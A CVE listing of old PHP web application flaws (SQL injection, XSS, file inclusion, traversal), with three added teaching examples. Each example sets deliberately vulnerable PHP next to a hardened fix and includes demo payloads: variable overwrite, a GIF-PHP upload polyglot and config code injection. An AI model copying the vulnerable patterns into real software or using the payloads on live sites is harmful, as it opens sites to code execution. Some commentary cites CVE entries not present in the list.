15-11-2008 - 01:49 14-05-2007 - 19:19
CVE-2007-1292 7.5
SQL injection vulnerability in inlinemod.php in Jelsoft vBulletin before 3.5.8, and before 3.6.5 in the 3.6.x series, might allow remote authenticated users to execute arbitrary SQL commands via the postids parameter. NOTE: the vendor states that th
15-11-2008 - 01:44 06-03-2007 - 19:19
CVE-2007-2080 7.5
Multiple SQL injection vulnerabilities in XAMPP 1.6.0a for Windows allow remote attackers to execute arbitrary SQL commands via unspecified vectors in certain test scripts.
13-11-2008 - 01:37 17-04-2007 - 23:19
CVE-2007-2079 9.3
The ADONewConnection Connect function in adodb.php in XAMPP 1.6.0a and earlier for Windows uses untrusted input for the database server hostname, which allows remote attackers to trigger a library buffer overflow and execute arbitrary code via a long
13-11-2008 - 01:37 17-04-2007 - 23:19
CVE-2005-4218 7.5
SQL injection vulnerability in forum.php in PHPWebThings 1.4 allows remote attackers to execute arbitrary SQL commands via the msg parameter, a different vulnerability than CVE-2005-3585.
10-09-2008 - 15:51 14-12-2005 - 06:03
CVE-2007-2431 6.8
Dynamic variable evaluation vulnerability in shared/config/tce_config.php in TCExam 4.0.011 and earlier allows remote attackers to conduct cross-site scripting (XSS) and possibly other attacks by modifying critical variables such as $_SERVER, as demo
05-09-2008 - 17:23 01-05-2007 - 20:19
CVE-2007-1709 4.3
Buffer overflow in the confirm_phpdoc_compiled function in the phpDOC extension (PECL phpDOC) in PHP 5.2.1 allows context-dependent attackers to execute arbitrary code via a long argument string.
05-09-2008 - 17:21 26-03-2007 - 21:19
CVE-2007-1475 5.4
Multiple buffer overflows in the (1) ibase_connect and (2) ibase_pconnect functions in the interbase extension in PHP 4.4.6 and earlier allow context-dependent attackers to execute arbitrary code via a long argument.
05-09-2008 - 17:20 16-03-2007 - 17:19
CVE-2007-1413 7.5
Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and earlier, including PHP 4.4.6 and probably other PHP 4 versions, allows context-dependent attackers to execute arbitrary code via a long value in the third argument (object
05-09-2008 - 17:20 12-03-2007 - 19:19
CVE-2007-1412 7.8
The cpdf_open function in the ClibPDF (cpdf) extension in PHP 4.4.6 allows context-dependent attackers to obtain sensitive information (script source code) via a long string in the second argument.
05-09-2008 - 17:20 12-03-2007 - 19:19
CVE-2007-1401 6.9
Buffer overflow in the crack extension (CrackLib), as bundled with PHP 4.4.6 and other versions before 5.0.0, might allow local users to gain privileges via a long argument to the crack_opendict function.
05-09-2008 - 17:20 10-03-2007 - 17:19
CVE-2006-7080 4.3
Directory traversal vulnerability in the avatar upload feature in exV2 2.0.4.3 and earlier allows remote attackers to delete arbitrary files via ".." sequences in the old_avatar parameter.
05-09-2008 - 17:16 02-03-2007 - 16:18
CVE-2006-7079 6.8
Variable extraction vulnerability in include/common.php in exV2 2.0.4.3 and earlier allows remote attackers to overwrite arbitrary program variables and conduct directory traversal attacks to execute arbitrary code by modifying the $xoopsOption['page
05-09-2008 - 17:16 02-03-2007 - 16:18
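CVE-2007-2431 ("dynamic variable evaluation"), CVE-2006-7079 ("variable extraction") and the register_globals entries such as CVE-2006-3532, CVE-2008-6726 and CVE-2009-2784 share one mechanism: request data is turned into ordinary PHP variables in the script's scope, so a parameter named after an internal variable replaces it. The block below is an added example written for this page, not code from TCExam, exV2 or any other listed product; the theme directory layout and parameter names are assumptions.

```php
<?php
// Added example for this page; not code from any listed product.

// Vulnerable: the script sets a trusted variable, then pulls request data
// into the same scope. extract() overwrites by default (EXTR_OVERWRITE), and
// register_globals=On (removed in PHP 5.4) did the same for every request
// without any call at all. A request carrying theme_dir=../../../../tmp/x
// now decides what gets included.
function header_path_vulnerable(array $request): string
{
    $theme_dir = '/var/www/app/themes/default';
    extract($request);
    return $theme_dir . '/header.php';
}

// EXTR_SKIP stops variables that already exist from being clobbered, but a
// name the script has not assigned yet is still created from the request,
// so this only covers variables initialised before the call.
function header_path_extr_skip(array $request): string
{
    $theme_dir = '/var/www/app/themes/default';
    extract($request, EXTR_SKIP);
    return $theme_dir . '/header.php';
}

// Fix: never extract untrusted input into the local scope. Read the one
// parameter you need by name and map it onto a fixed set of choices.
function header_path_safe(array $request): string
{
    $themes = ['default', 'dark'];               // assumed theme set
    $theme  = $request['theme'] ?? 'default';
    if (!in_array($theme, $themes, true)) {
        $theme = 'default';
    }
    return '/var/www/app/themes/' . $theme . '/header.php';
}

// Constructed request: the attacker names the internal variable directly.
$request = ['theme_dir' => '../../../../tmp/x', 'theme' => '../../x'];

echo header_path_vulnerable($request), "\n";   // path now comes from the request
echo header_path_extr_skip($request), "\n";    // default preserved
echo header_path_safe($request), "\n";         // default preserved
```

The same overwrite reaches any variable in scope at the point of extraction, which is how the entries above get from a request parameter to $_SERVER values, include paths and the flags that decide whether a check runs at all.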
CVE-2006-4450 5.1
usercp_avatar.php in PHPBB 2.0.20, when avatar uploading is enabled, allows remote attackers to use the server as a web proxy by submitting a URL to the avatarurl parameter, which is then used in an HTTP GET request.
05-09-2008 - 17:09 29-08-2006 - 21:04
CVE-2006-3608 4.6
The Gallery module in Simone Vellei Flatnuke 2.5.7 and earlier, when Gallery uploads are enabled, does not restrict the extensions of uploaded files that begin with a GIF header, which allows remote authenticated users to execute arbitrary PHP code v
05-09-2008 - 17:07 18-07-2006 - 11:46
CVE-2006-3532 5.1
PHP file inclusion vulnerability in includes/edit_new.php in Pivot 1.30 RC2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a FTP URL or full file path in the Paths[extensions_path] parameter.
05-09-2008 - 17:07 12-07-2006 - 17:05
CVE-2006-3105 5.0
CRLF injection vulnerability in Bitweaver 1.3 allows remote attackers to conduct HTTP response splitting attacks via CRLF sequences in multiple unspecified parameters that are injected into HTTP headers, as demonstrated by the BWSESSION parameter
05-09-2008 - 17:06 20-06-2006 - 21:02
CVE-2006-2889 5.1
Multiple SQL injection vulnerabilities in index.php in Pixelpost 1-5rc1-2 and earlier allow remote attackers to execute arbitrary SQL commands, and leverage them to gain administrator privileges, via the (1) category or (2) archivedate parameter.
05-09-2008 - 17:05 07-06-2006 - 06:02
CVE-2006-2406 2.6
Directory traversal vulnerability in bb_lib/abbc.css.php in Unclassified NewsBoard (UNB) 1.5.3-d and possibly earlier versions, when register_globals is enabled, allows remote attackers to include arbitrary files via .. (dot dot) sequences and a trai
05-09-2008 - 17:04 16-05-2006 - 06:02
CVE-2006-1916 6.8
Multiple cross-site scripting (XSS) vulnerabilities in profile.php in DbbS 2.0-alpha and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ulocation or (2) uhobbies parameters.
05-09-2008 - 17:03 20-04-2006 - 14:06
CVE-2006-1793 7.6
Directory traversal vulnerability in runCMS 1.2 and earlier allows remote attackers to read arbitrary files via the bbPath[path] parameter to (1) class.forumposts.php and (2) forumpollrenderer.php. NOTE: this issue is closely related to CVE-2006-0659
05-09-2008 - 17:02 17-04-2006 - 06:02
CVE-2006-1164 7.5
Nodez 4.6.1.1 and earlier stores sensitive data in the list.gtdat file under the web document root with insufficient access control, which allows remote attackers to obtain usernames and password hashes by directly accessing list.gtdat.
05-09-2008 - 17:01 12-03-2006 - 16:02
CVE-2006-0894 4.3
Multiple cross-site scripting (XSS) vulnerabilities in NOCC Webmail 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the html_error_occurred parameter in error.php, (2) html_filter_select parameter in filter_prefs.php, (3) ht
05-09-2008 - 17:00 25-02-2006 - 06:02
CVE-2006-0891 5.0
Multiple directory traversal vulnerabilities in NOCC Webmail 1.0 allow remote attackers to include arbitrary files via .. (dot dot) sequences and a trailing NULL (%00) byte in (1) the _SESSION['nocc_theme'] parameter in (a) html/footer.php; and (2) t
05-09-2008 - 17:00 25-02-2006 - 06:02
CVE-2006-0786 5.1
Incomplete blacklist vulnerability in include.php in PHPKIT 1.6.1 Release 2 and earlier, with allow_url_fopen enabled, allows remote attackers to conduct PHP remote file include attacks via a path parameter that specifies a (1) UNC share or (2) ftps
05-09-2008 - 17:00 19-02-2006 - 06:02
CVE-2006-0644 7.5
Multiple directory traversal vulnerabilities in install.php in CPG-Nuke Dragonfly CMS (aka CPG Dragonfly CMS) 9.0.6.1 allow remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in (
05-09-2008 - 16:59 10-02-2006 - 06:02
CVE-2005-4593 7.5
PHP remote file inclusion vulnerability in phpDocumentor 1.3.0 rc4 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary code via a URL in the (1) FORUM[LIB] parameter in Documentation/tests/bug-559668.php and (2
05-09-2008 - 16:57 31-12-2005 - 00:00
CVE-2005-4554 7.5
Multiple SQL injection vulnerabilities in DEV web management system 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat parameter in an openforum action (openforum.php) in index.php, (2) cat parameter in getfile.p
05-09-2008 - 16:57 28-12-2005 - 06:03
CVE-2005-4449 4.0
verify.php in FlatNuke 2.5.6 allows remote authenticated administrators to modify arbitrary PHP files by setting the file parameter to an arbitrary file and injecting the code into the body parameter. NOTE: if a FlatNuke administrator is normally as
05-09-2008 - 16:56 21-12-2005 - 06:03
CVE-2005-4208 5.0
Directory traversal vulnerability in Flatnuke 2.5.6 allows remote attackers to access arbitrary files via a .. (dot dot) and null byte (%00) in the id parameter of the read module.
05-09-2008 - 16:56 13-12-2005 - 06:03
CVE-2005-4171 7.5
The "Upload new image" command in the "Manage Images" eFiction 1.1, when members are allowed to upload images, allows remote attackers to execute arbitrary PHP code by uploading a filename with a .php extension that contains a GIF header, which passe
05-09-2008 - 16:56 11-12-2005 - 16:03
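CVE-2006-3608 and CVE-2005-4171 above describe the classic upload bypass: the application checks that the file "is an image" by looking at its header, then stores it under the name the client supplied, so a .php file that begins with GIF89a is both accepted and executed. The block below is an added example written for this page, not code from Flatnuke or eFiction; the upload directory, the allowed types and the sample file are constructed.

```php
<?php
// Added example for this page; not code from any listed product.

// Vulnerable: the only check is getimagesize(), which is satisfied by a valid
// GIF header followed by anything. The file then keeps its client-supplied
// name, so shell.php lands in a web-served directory and runs as PHP.
function store_upload_vulnerable(string $tmpPath, string $clientName, string $uploadDir): ?string
{
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    $dest = $uploadDir . '/' . basename($clientName);
    copy($tmpPath, $dest);
    return $dest;
}

// Hardened: derive the extension from the detected image type, never from
// the client name; generate the stored name; and keep the directory free of
// a PHP handler (and ideally outside the document root).
function store_upload_safe(string $tmpPath, string $uploadDir): ?string
{
    $info = @getimagesize($tmpPath);
    if ($info === false) {
        return null;
    }
    $byType = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    $ext    = $byType[$info[2]] ?? null;
    if ($ext === null) {
        return null;           // image type outside the allow-list
    }
    $dest = $uploadDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    copy($tmpPath, $dest);
    return $dest;
}

// Constructed sample: PHP code behind a minimal 1x1 GIF header, uploaded
// under a script name.
$dir = sys_get_temp_dir() . '/upload-demo-' . getmypid();
mkdir($dir);
$tmp = $dir . '/incoming';
file_put_contents($tmp, "GIF89a\x01\x00\x01\x00\x00<?php echo 'hello'; ?>");

var_export(store_upload_vulnerable($tmp, 'avatar.php', $dir));   // stored as avatar.php
echo "\n";
var_export(store_upload_safe($tmp, $dir));                       // random name, .gif
echo "\n";

// Clean up the demonstration files.
array_map('unlink', glob($dir . '/*'));
rmdir($dir);
```

The hardened version still stores a polyglot (a GIF that contains PHP), which is why the name and the directory configuration matter as much as the content check: with a .gif name in a directory where PHP is not executed, the embedded code is inert unless some later local file inclusion bug, like the ones listed above, includes it.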
CVE-2005-4155 7.5
registration.PHP in ATutor 1.5.1 pl2 allows remote attackers to execute arbitrary SQL commands via an e-mail address that ends in a NULL character, which bypasses the PHP regular expression check. NOTE: it is possible that this is actually a bug in P
05-09-2008 - 16:56 10-12-2005 - 21:03
CVE-2005-4087 7.5
PHP remote file include vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management (SugarCRM) 4.0 beta and earlier allows remote attackers to execute arbitrary PHP code via a URL in the beanFiles array parameter.
05-09-2008 - 16:56 08-12-2005 - 06:03
CVE-2005-3010 7.5
Direct static code injection vulnerability in the flood protection feature in inc/shows.inc.php in CuteNews 1.4.0 and earlier allows remote attackers to execute arbitrary PHP code via the HTTP_CLIENT_IP header (Client-Ip), which is injected into data
05-09-2008 - 16:53 21-09-2005 - 16:03
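CVE-2009-2736, CVE-2009-2111 and CVE-2005-3010 above are all "static code injection": a setting is written into a .php file by string concatenation, so a quote in the value ends the literal and the rest is parsed as code the next time the file is included. In the CuteNews case the value comes from the Client-Ip header rather than a form field, which is a reminder that headers are user input too. The block below is an added example written for this page, not code from OpenNews, DB Top Sites or CuteNews; the setting name and the payload are assumptions.

```php
<?php
// Added example for this page; not code from any listed product.

// Vulnerable: a value is dropped into PHP source with nothing but quotes
// around it. A value containing a quote escapes the literal.
function render_config_vulnerable(array $settings): string
{
    $src = "<?php\n";
    foreach ($settings as $name => $value) {
        $src .= "\$config['$name'] = '$value';\n";
    }
    return $src;
}

// Hardened: validate the setting name, and let var_export() produce the PHP
// literal; it escapes quotes and backslashes, so the value stays data.
function render_config_safe(array $settings): string
{
    $src = "<?php\n";
    foreach ($settings as $name => $value) {
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', (string) $name)) {
            throw new InvalidArgumentException('invalid setting name');
        }
        $src .= '$config[' . var_export((string) $name, true) . '] = '
              . var_export($value, true) . ";\n";
    }
    return $src;
}

// Better still: keep settings out of executable files altogether.
function render_config_json(array $settings): string
{
    return json_encode($settings, JSON_PRETTY_PRINT | JSON_THROW_ON_ERROR);
}

// Check used below: does the generated source contain a given statement
// token anywhere? Inside a string literal the tokenizer would not see it.
function contains_token(string $src, int $tokenId): bool
{
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === $tokenId) {
            return true;
        }
    }
    return false;
}

// Constructed payload: closes the string literal, appends a statement, and
// comments out the remainder of the original line.
$settings = ['overall_width' => "800'; echo 'injected'; //"];

echo render_config_vulnerable($settings);
var_dump(contains_token(render_config_vulnerable($settings), T_ECHO));   // echo is live code
echo render_config_safe($settings);
var_dump(contains_token(render_config_safe($settings), T_ECHO));         // echo is inside a string
echo render_config_json($settings), "\n";
```

Note that the sun-jester entry (CVE-2009-2736) requires an authenticated administrator, while the DB Top Sites and CuteNews entries do not; the defect is the same, the difference is only who can reach the form that writes the file.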
CVE-2005-2814 4.3
Cross-site scripting (XSS) vulnerability in FlatNuke 2.5.6 allows remote attackers to inject arbitrary web script or HTML via the usr parameter in a vis_reg operation to index.php.
05-09-2008 - 16:52 07-09-2005 - 14:03
CVE-2005-2488 4.3
Cross-site scripting (XSS) vulnerability in Web Content Management News System allows remote attackers to inject arbitrary web script or HTML via (1) the strRootpath parameter to validsession.php or (2) the strTable parameter to Admin/News/List.php.
05-09-2008 - 16:51 07-08-2005 - 00:00
CVE-2005-2397 4.3
Cross-site scripting (XSS) vulnerability in guestbook.php in phpBook 1.46 allows remote attackers to inject arbitrary web script or HTML via the admin parameter.
05-09-2008 - 16:51 27-07-2005 - 00:00